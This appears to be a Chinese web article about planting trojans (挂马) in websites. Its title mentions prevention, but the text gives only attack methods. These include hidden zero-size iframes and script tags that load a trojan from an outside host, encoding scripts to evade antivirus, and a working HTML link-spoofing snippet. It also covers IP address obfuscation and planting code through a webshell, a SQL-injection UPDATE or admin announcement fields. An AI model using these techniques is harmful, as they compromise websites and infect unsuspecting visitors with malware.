了解常用集中网站挂马和防范方法

核心提示： 挂马首先要求的是隐蔽性，这样挂的时间才能长，了解常用集中网站挂马和防范方法(3)，像在SWF、JS、RM中挂马就是比较隐蔽了，但是还可再用到些技巧，然后update数据库达到我们的目的，如果可进入后台，(1)远程任意后缀执行HTML可以把horse.html改成horse.jpg之类的后缀

挂马首先要求的是隐蔽性，这样挂的时间才能长。像在SWF、JS、RM中挂马就是比较隐蔽了，但是还可再用到些技巧。

(1)远程任意后缀执行HTML

可以把horse.html改成horse.jpg之类的后缀，然后语句写成<iframesrc=/uploadfile/200902 /20090220105353594.jpg width=0 height=0></iframe>。js也可以，语句为<script src=http://tech.ddvip.com/uploadfile/200902/20090220105353594.jpg></script>，甚至js的不要后缀名都可以。

2)JS的加密

为了保护网页木马的代码，可以把JS内容加密，还能躲开杀软的作用。如果使用ENCODE加密方式，加密后的JS调用语句就用<scriptlanguage=”jscript”.encode”src=http://www.arthack.org/horse.txt& gt;</script>。除此方法外，还有其它更多的方法！

(3)URL的变形

URL的变形方法也有很多，例如将url的16进制转换为encod编码等。如果是涉及到URL欺骗的方法就更多了，不过多数的URL欺骗，像利用@的技巧，IE都已经打补丁了。但现在有个漏洞仍然有效，代码如下：

<a id=”CZY” href=http://www.arthack.org”></a>
<div>
<a href=http://www.google.cn” target=”_blank”>
<table>
<caption>
<a href=http://www.google.cn” target=”_blank”>
<label for=”CZY”>
<u style=”cursor: pointer: color: blue”>
Google</u>
</label></a></caption></table></a></div>

保存该代码为网页后，鼠标移动到Google这个链接上时，IE状态栏显示的http://www.google.cn，但点击链接后却打开 http://www.arthack.org网站。如果你的网马可以用IP地址访问到的话，IP地址也可以进行转换的。像127.0.0.1这样的IP 还可以 变为 2130706433、0×7f.0×00.0×00.0×01、0177.0000.0000.0001等等，这只不过是8进制、10进制、16进制、的转换而已。

3、如何才能挂到马

拿到了webshell的话，挂马自然是很简单了。但是拿不到的情况下，如果注入点有update权限，我们可以仔细查找首页中的某条新闻的调用链接，然后update数据库达到我们的目的。如果可进入后台，我没就可以在一些发公告的地方写入自己的木马代码(不过千万别打乱前台html源文件里的代码逻辑)。